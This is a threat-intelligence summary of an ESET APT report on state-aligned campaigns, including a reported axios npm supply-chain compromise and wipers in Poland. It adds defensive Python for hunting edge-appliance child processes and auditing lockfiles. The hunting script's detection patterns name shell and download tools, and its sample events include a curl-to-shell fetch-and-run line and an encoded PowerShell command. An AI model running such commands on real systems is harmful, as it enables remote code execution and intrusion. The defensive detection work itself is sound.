
ESET APT Activity Report Q4 2025–Q1 2026

ESET's Q4 2025–Q1 2026 APT Activity Report highlights global espionage and destructive campaigns by state-aligned actors. Notable incidents include a major supply chain compromise of the 'axios' npm library by Lazarus, destructive wiper attacks on Polish critical infrastructure by Sandworm, and the deployment of new edge-device implants like PhiliKit against Ivanti VPNs by China-aligned groups.

Confidence: high · Analyzed: 2026-05-29 · Google

Authors: ESET Research

Actors: FamousSparrow, SteppeDriver, UNC5221, NegativeGlimmer, Rusty Boots, MoKhargosh, MOØN Badr, Lazarus, DeceptiveDevelopment, Kimsuky, Konni, Andariel, ScarCruft, Sednit, Sandworm, Operation DreamJob, Operation DangerousPassword

Source:ESET

IOCs · 1
  • npm_package: axios. Compromised by the Lazarus group during Operation DangerousPassword to inject trojanized code into downstream applications.


What Happened

State-sponsored hacking groups from China, Russia, North Korea, and Iran conducted widespread cyber espionage and destructive attacks between late 2025 and early 2026. Targets included government agencies, defense contractors, and critical infrastructure worldwide. Notably, hackers compromised a highly popular software library called 'axios', potentially affecting millions of applications, and launched destructive attacks against a Polish energy company. Organizations should ensure their software supply chains are secure, patch internet-facing appliances like VPNs, and monitor for unusual network activity.

Key Takeaways

  • North Korea's Lazarus group compromised the widely used 'axios' npm library (100M+ weekly downloads) via stolen maintainer credentials to inject trojanized code.
  • Russia's Sandworm deployed wipers against a Polish energy company, marking a rare destructive attack against critical infrastructure in a NATO member state.
  • China-aligned groups deployed a new implant, PhiliKit, targeting Ivanti VPN appliances, and focused heavily on maritime, energy, and strategic technology sectors.
  • Iran-aligned APT activity temporarily declined due to domestic internet restrictions, but proxy groups increased attacks against Israel and the US.
  • Andariel reemerged in South Korea, deploying TigerRAT and Rook ransomware against an engineering firm involved in nuclear and liquid hydrogen technologies.

Affected Systems

  • Ivanti VPN appliances
  • SmartOffice CRM servers
  • npm registry (axios library)
  • Android devices
  • Windows systems

Attack Chain

Threat actors used a variety of initial access vectors, including exploitation of internet-facing appliances (Ivanti VPNs, SmartOffice CRM) and social engineering (Operation DreamJob). In a notable supply chain attack, Lazarus used stolen maintainer credentials to publish trojanized code into the axios npm library, reaching every downstream project that resolved the poisoned version. Post-compromise activity involved deploying implants and C2 tooling (PhiliKit, Covenant, BeardShell) for espionage, or executing wipers, bootkits and ransomware (Rook) for destructive impact and financial gain.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

No specific detection rules or queries are provided in the article.

Detection Engineering Assessment

  • EDR Visibility: High. EDR is highly effective at detecting post-exploitation implants, ransomware execution (Rook), and bootkit/wiper activity on endpoints. Note that EDR agents generally cannot be installed on VPN or CRM appliances themselves, so implants such as PhiliKit must be caught from the network side or from appliance logs.
  • Network Visibility: Medium. Network monitoring can identify anomalous traffic from compromised edge devices (VPNs, CRM servers) and C2 communication from known implants.
  • Detection Difficulty: Moderate. Destructive payloads and ransomware are noisy and comparatively easy to detect; sophisticated supply chain compromises and custom edge-device implants require behavioral monitoring rather than signature matching.

Required Log Sources

  • EDR telemetry
  • VPN access logs
  • Web server access logs
  • Authentication logs

Hunting Hypotheses

  • Hypothesis: Hunt for anomalous child processes spawned by VPN or CRM web server processes, which may indicate exploitation of edge appliances.
    Telemetry: process creation events (Windows Event ID 4688 or Sysmon Event ID 1)
    ATT&CK stage: Initial Access / Execution
    FP risk: Low
  • Hypothesis: If you have visibility into developer environments, hunt for unexpected modifications to build scripts or unauthorized package publishing activity.
    Telemetry: application logs / CI/CD pipeline logs
    ATT&CK stage: Execution / Persistence
    FP risk: Medium
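The first hypothesis above, expressed as runnable hunting logic. This is an added example written for this page, not tooling from the ESET report: the records are constructed to resemble Sysmon Event ID 1 / Windows 4688 process-creation events exported as JSON, the field names (Computer, ParentImage, Image, CommandLine) follow Sysmon's and are an assumption about your pipeline, and the parent-process list is illustrative. The page names no Ivanti or SmartOffice service binaries, so none are invented here; populate EDGE_PARENTS from your own appliance inventory.

```python
"""Hunt for anomalous child processes of edge-appliance web/VPN services.

Added example, not from the ESET report. Sample events are constructed;
field names follow Sysmon Event ID 1 and are an assumption about your SIEM export.
"""
import json
import re
from typing import Iterable

# Service images that front internet-facing web/VPN functionality (assumed list;
# replace with the real service binaries from your appliance inventory).
EDGE_PARENTS = {"w3wp.exe", "httpd", "httpd.exe", "nginx", "apache2",
                "php-fpm", "lighttpd", "openvpn"}

# Children an appliance service should essentially never spawn.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash",
                       "dash", "python", "python3", "perl", "curl", "wget",
                       "certutil.exe", "bitsadmin.exe", "mshta.exe",
                       "rundll32.exe", "regsvr32.exe", "nc", "ncat", "socat"}

# Command-line fragments typical of webshell / one-liner post-exploitation.
RISKY_ARGS = re.compile(
    r"(-enc\b|\bIEX\b|Invoke-\w+|base64|/dev/tcp/|\|\s*(sh|bash)\b)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Image file name, tolerant of both Windows and POSIX separators."""
    return re.split(r"[\\/]", path.strip())[-1].lower()


def score_event(ev: dict) -> tuple:
    """Score one process-creation event; 0 means the parent is not an edge service."""
    parent = basename(ev.get("ParentImage", ""))
    child = basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    reasons = []
    if parent not in EDGE_PARENTS:
        return 0, reasons
    score = 1
    reasons.append(f"parent {parent} is an edge web/VPN service")
    if child in SUSPICIOUS_CHILDREN:
        score += 2
        reasons.append(f"child {child} is an interpreter or downloader")
    if RISKY_ARGS.search(cmdline):
        score += 2
        reasons.append("command line contains encoded/remote-execution fragments")
    return score, reasons


def hunt(events: Iterable[dict], threshold: int = 3) -> list:
    """Return events scoring at or above threshold, with the reasons attached."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"host": ev.get("Computer"), "score": score,
                         "reasons": reasons, "event": ev})
    return hits


# Constructed sample telemetry (not real data); 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    {"Computer": "crm01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"Computer": "crm01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\conhost.exe", "CommandLine": "conhost.exe 0x4"},
    {"Computer": "vpn-edge", "ParentImage": "/usr/sbin/nginx",
     "Image": "/bin/sh", "CommandLine": "sh -c 'curl http://203.0.113.5/x | sh'"},
    {"Computer": "ws-42", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(json.dumps({k: hit[k] for k in ("host", "score", "reasons")}))
```

The scoring is deliberately additive: an appliance service spawning conhost.exe scores 1 and stays below the threshold, while the same parent spawning cmd.exe with an encoded PowerShell argument scores 5. Tune the threshold against a baseline of your own appliances; legitimate hook scripts on some products do spawn shells, which is why the FP risk is listed as low rather than none.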

Control Gaps

  • Lack of MFA on developer accounts
  • Unpatched edge appliances

Key Behavioral Indicators

  • Anomalous process execution from web or VPN appliance directories
  • Unexpected disk or MBR modification attempts

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Audit your full dependency tree, including transitive dependencies and lockfiles, for compromised versions of the 'axios' npm package, and pin to a version confirmed as clean; a trojanized copy can be pulled in by another package even if your own package.json never references axios.
  • Review authentication and access logs for internet-facing VPN and CRM appliances for signs of unauthorized access.
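A lockfile audit for the axios recommendation above, as an added example written for this page (not ESET's or the axios project's tooling). The report excerpt does not name the trojanized version numbers, so BLOCKLISTED_VERSIONS is an empty placeholder to be filled from the official advisory; the lockfile contents are constructed inline so the script runs offline, and the "9.9.9-constructed" version and sha512-AAA style hashes are invented for the demonstration.

```python
"""Inventory every resolved version of axios in an npm lockfile and flag
versions designated as compromised.

Added example, not ESET's or axios's tooling. Sample lockfiles are constructed;
BLOCKLISTED_VERSIONS is a placeholder to fill from the official advisory.
"""
import json
import sys
from typing import Iterator, Optional, Tuple

# PLACEHOLDER: populate from the official advisory / npm registry before use.
BLOCKLISTED_VERSIONS = set()


def iter_packages(lock: dict) -> Iterator[Tuple[str, Optional[str], Optional[str]]]:
    """Yield (name, version, integrity) for every dependency in the lockfile.

    lockfileVersion 2/3 carry a flat "packages" map keyed by install path;
    lockfileVersion 1 carries a nested "dependencies" tree. v2 files contain
    both, so "packages" is preferred to avoid double counting.
    """
    packages = lock.get("packages")
    if packages:
        for path, meta in packages.items():
            if not path:  # "" is the root project itself
                continue
            # "node_modules/a/node_modules/@scope/b" -> "@scope/b"
            name = meta.get("name") or path.split("node_modules/")[-1]
            yield name, meta.get("version"), meta.get("integrity")
        return

    def walk(deps: dict):
        for name, meta in deps.items():
            yield name, meta.get("version"), meta.get("integrity")
            yield from walk(meta.get("dependencies", {}))

    yield from walk(lock.get("dependencies", {}))


def audit(lock: dict, package: str = "axios", blocklist=BLOCKLISTED_VERSIONS) -> dict:
    """Collect all resolved versions of `package` (nested copies included) and flag bad ones."""
    versions = {}  # version -> set of integrity hashes seen for it
    for name, version, integrity in iter_packages(lock):
        if name == package and version is not None:
            versions.setdefault(version, set()).add(integrity or "<none>")
    return {
        "versions": versions,
        "flagged": sorted(v for v in versions if v in blocklist),
        # One version resolved with two different hashes points at a tampered mirror or cache.
        "inconsistent_integrity": sorted(v for v, h in versions.items() if len(h) > 1),
    }


# Constructed sample lockfiles (not real projects; hashes are placeholders).
SAMPLE_LOCK_V3 = {
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"axios": "^1.6.0"}},
        "node_modules/axios": {"version": "1.6.8", "integrity": "sha512-AAA"},
        "node_modules/some-sdk": {"version": "2.0.0", "integrity": "sha512-BBB"},
        "node_modules/some-sdk/node_modules/axios": {
            "version": "9.9.9-constructed", "integrity": "sha512-CCC"},
    },
}
SAMPLE_LOCK_V1 = {
    "name": "legacy-app", "lockfileVersion": 1,
    "dependencies": {
        "some-sdk": {"version": "2.0.0", "integrity": "sha512-BBB",
                     "dependencies": {"axios": {"version": "9.9.9-constructed",
                                                "integrity": "sha512-DDD"}}},
        "axios": {"version": "9.9.9-constructed", "integrity": "sha512-CCC"},
    },
}

if __name__ == "__main__":
    lock = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOCK_V3
    print(json.dumps(audit(lock), default=sorted, indent=2))
```

Run it against a real project with the lockfile path as the first argument. `npm ls axios --all` gives a similar inventory from the installed tree, but the lockfile is what CI actually resolves, so it is the artifact to audit; the nested copy under some-sdk in the sample is exactly the case a top-level package.json check would miss.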

Infrastructure Hardening

  • Ensure all internet-facing appliances, particularly Ivanti VPNs and SmartOffice CRM servers, are updated to the latest firmware.
  • Enforce multi-factor authentication (MFA) for all developer accounts and access to critical code repositories.

User Protection

  • If your EDR supports it, ensure behavioral protections against bootkit modifications and ransomware execution are enabled.
  • Consider deploying mobile device management (MDM) solutions to prevent the installation of unverified Android applications.

Security Awareness

  • Educate developers and staff on the risks of sophisticated social engineering schemes, such as Operation DreamJob.
  • Train users to recognize browser-in-the-browser phishing techniques.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
  • T1190 - Exploit Public-Facing Application
  • T1078 - Valid Accounts
  • T1561.002 - Disk Wipe: Disk Structure Wipe
  • T1486 - Data Encrypted for Impact
  • T1566.002 - Phishing: Spearphishing Link